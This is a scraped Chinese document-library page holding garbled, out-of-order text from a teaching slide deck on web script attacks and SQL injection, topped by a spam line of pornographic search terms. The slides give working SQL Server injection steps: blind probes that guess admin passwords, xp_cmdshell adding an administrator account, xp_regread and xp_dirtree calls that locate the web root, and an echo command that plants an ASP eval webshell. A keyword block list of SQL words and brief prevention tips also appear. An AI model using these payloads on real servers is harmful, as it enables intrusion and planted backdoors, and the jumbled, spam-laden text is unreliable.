freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡(luò)腳本攻擊與防御ppt-文庫吧資料

2024-12-14 11:50本頁面
  

【正文】 再執(zhí)行: Exec 39。Xp_regwrite39。Xp_regremovemultistring39。Xp_regread39。Xp_regenumvalues39。Xp_regdeletevalue39。Xp_regdeletekey39。Xp_regaddmultistring39。Sp_OAStop39。Sp_OASetProperty39。Sp_OAMethod39。Sp_OAGetProperty39。Sp_OAGetErrorInfo39。Sp_OADestroy39。Sp_OACreate39。xp_cmdshell39。如果先在數(shù)據(jù)庫之中插入構(gòu)造的 ASP木馬語句,然后再把數(shù)據(jù)庫備份到磁盤,命名為“ ”,就可以得到 webshell了。insert into tmp exec master..xp_dirtree ?d:\?,0,1 ? 第二步,直接測試 D盤下是否有目標(biāo)文件“ ”,提交如下語句: and (slecet str(id)%2b??%2bstr(depth)%2b?? from tmp where name=?? and isfile=1)0 2. 寫入 webshell 通過備份數(shù)據(jù)庫來獲得 webshell。insert into tmp exec master..xp_dirtree ?d:\?,1,1 ? 獲取第一條數(shù)據(jù): and (select name from tmp where id=1)1 ? 這樣通過遞增 ID就可以把所有目錄讀取出來,一定可以找出 web目錄。 方法一: ? 首先建立一個臨時表把目標(biāo)盤下面的 1級子目錄和文件插入到表中: 。這個擴(kuò)展存儲過程同樣只需要 Public權(quán)限就可以運(yùn)行它,它有三個參數(shù),第一個參數(shù)是路徑,第二個是目錄深度,第三個表示是否列出文件。Exec HKEY_LOCAL_MACHINE, ?SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\?, ?/? ? 利用擴(kuò)展存儲過程 xp_dirtree。 db_owner權(quán)限下的注入 直接獲取 webshell的方法: WEB路徑 在 db_owner權(quán)限下要得到 WEB路徑基本只有兩個辦法: ? 利用擴(kuò)展存儲過程 xp_regread,只要有 Public權(quán)限就可以運(yùn)行它。ping 你的 IP? 使用此方法時先打開防火墻的禁止 ping入功能,執(zhí)行命令后防火墻就會提示某 ip地址禁止 ping入,那就是數(shù)據(jù)庫服務(wù)器的 ip地址。 此方法用在可以得到命令回顯的情況下,用ipconfig命令得到 ip地址 方法二: 。exec 39。exec ?echo ^^%eval request(chr(35))%^^ D:\WEB\?。找 web目錄現(xiàn)在一般有讀取注冊表和遍歷目錄法,寫入木馬是利用 xp_cmdshell擴(kuò)展存儲執(zhí)行命令。 如何利用 Sa權(quán)限取得 webshell? ? 可以利用對 Access數(shù)據(jù)庫注入的方法,猜解管理員帳戶密碼,登陸后臺再通過上傳或者寫入配置文件等方法得到 webshell,如前介紹。 webshell的優(yōu)點(diǎn) webshell 最大的優(yōu)點(diǎn)就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過 80端口傳遞的,因此不會被防火墻攔截。 什么是 webshell? 所謂 webshell就是一個 asp或 php木馬后門,黑客在入侵了一個網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的 web目錄中,與正常的網(wǎng)頁文件混在一起。 localgroup administrators helen /add39。 。exec 39。)) 。 如果返回正常的話就說明數(shù)據(jù)庫連接帳戶是 Sa權(quán)限 ? and 1=(select IS_MEMBER(39。/Script SQLServer數(shù)據(jù)庫的注入 ? 判斷帳號的權(quán)限 ?帳戶有三種不同的權(quán)限: Sa權(quán)限、 Db_owner權(quán)限、Public權(quán)限 ? 。請不要在參數(shù)中包含非法字符嘗試注入! 39。/Script 39。請不要在參數(shù)中包含非法字符嘗試注入! 39。|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|or|char|declare Tc_Inf = split(Tc_In,|) 39。定義需要過濾的字串 Tc_In=39。owen sql,conn,1,1 title=rsnews(title) if and then (數(shù)據(jù)庫出錯 ) else % ? ? and 1=2 sql=select * from news where id=37 and 1=2 ? and 1=1 ? and 0(select count(*) from admin) 猜測是否存在 admin表 ? and 1=(select count(*) from admin where len(pass)0) 猜測是否存在 pass字段 ? and 1=(select count(*) from admin where len(password)0) ? and (select asc(mid(password,1,1)) from admin)100 假設(shè) pssword字段中第一個記錄的第一位的 ASCII碼大于 100,如果假設(shè)正確則應(yīng)該返回正常頁面 猜測 password字段是否存在 防止 SQL注入 (1) 在服務(wù)端正式處理之前對提交數(shù)據(jù)的合法性進(jìn)行檢查; (2) 封裝客戶端提交信息; (3) 替換或刪除敏感字符 /字符串; (4) 屏蔽出錯信息。 % owen=request(id)
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號-1